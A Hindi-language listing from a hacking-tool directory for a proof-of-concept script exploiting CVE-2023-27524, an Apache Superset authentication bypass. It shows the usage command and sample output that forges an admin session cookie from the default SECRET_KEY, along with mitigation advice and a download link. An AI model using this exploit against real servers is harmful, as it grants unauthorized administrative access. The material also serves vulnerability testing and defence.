Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-27524-POC — बिल्कुल नए CVE-2023-27524 के लिए एक POC जो प्रमाणीकरण बाईपास (authentication bypass) की अनुमति देता है और एडमिन डैशबोर्ड तक पहुंच प्रदान करता है। | Kitploit
उपकरण/GitHubGitHub/maanvader/cve-2023-27524-poc
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubmaanvader/cve-2023-27524-poc

CVE-2023-27524-POC

बिल्कुल नए CVE-2023-27524 के लिए एक POC जो प्रमाणीकरण बाईपास (authentication bypass) की अनुमति देता है और एडमिन डैशबोर्ड तक पहुंच प्रदान करता है।

रिपॉजिटरी देखें
3 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-27524: Apache Superset प्रमाणीकरण बायपास

यह स्क्रिप्ट जाँचती है कि क्या Apache Superset सर्वर (CVE-2023-27524) के प्रति संवेदनशील है और यदि यह संवेदनशील है, तो user_id = 1 के साथ एक सत्र कुकी जाली बनाएँ, जो सामान्यतः admin उपयोगकर्ता होता है, जिससे प्रमाणीकरण बायपास होता है और डैशबोर्ड तक पहुँच प्राप्त होती है। वर्तमान में, दुनिया भर में लगभग 3000 सर्वर Apache Superset चला रहे हैं।

उपयोग

root@kitploit:~
usage: python3 CVE-2023-27524.py  --url URL 

मूल उदाहरण

root@kitploit:~
% python3 CVE-2023-27524.py --url http://10.1.221.202:8080   
Got session cookie: eyJjc3JmX3Rva2VuIjoiZDBiYWI5ZmU0YTRjOWFiM2ZkMjc2YjA2ZDZiNWE0MDZmZmNkN2JkOCIsImxvY2FsZSI6ImVuIn0.ZEc0tw.X6y_rTie0yMP5oTFC6KNq8Me9ek
Decoded session cookie: {'csrf_token': 'd0bab9fe4a4c9ab3fd276b06d6b5a406ffcd7bd8', 'locale': 'en'}
Superset Version: 2.0.1
Vulnerable to CVE-2023-27524 - Using default SECRET_KEY: b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'
Forged session cookie for user 1: eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEc0tw.xmzJjq757QujOpk65jK0dLgCSDg
Now visit the url: `http://10.1.221.202:8080/superset/welcome` and replace the current session cookie with this `eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEc0tw.xmzJjq757QujOpk65jK0dLgCSDg` and refresh the page and we will be logged in as admin to the dashboard

शमन के उपाय

Flask SECRET_KEY उत्पन्न करने और कॉन्फ़िगर करने के लिए यहाँ दिए गए निर्देशों का पालन करें। superset CLI टूल का उपयोग SECRET_KEY को घुमाने के लिए किया जा सकता है ताकि मौजूदा डेटाबेस कनेक्शन जानकारी संरक्षित रहे।

अस्वीकरण

यह POC केवल शैक्षिक उद्देश्य के लिए बनाया गया है।

संदर्भ

  • https://github.com/horizon3ai/CVE-2023-27524
  • https://www.horizon3.ai/cve-2023-27524-insecure-default-configuration-in-apache-superset-leads-to-remote-code-execution/
टूल डाउनलोड करें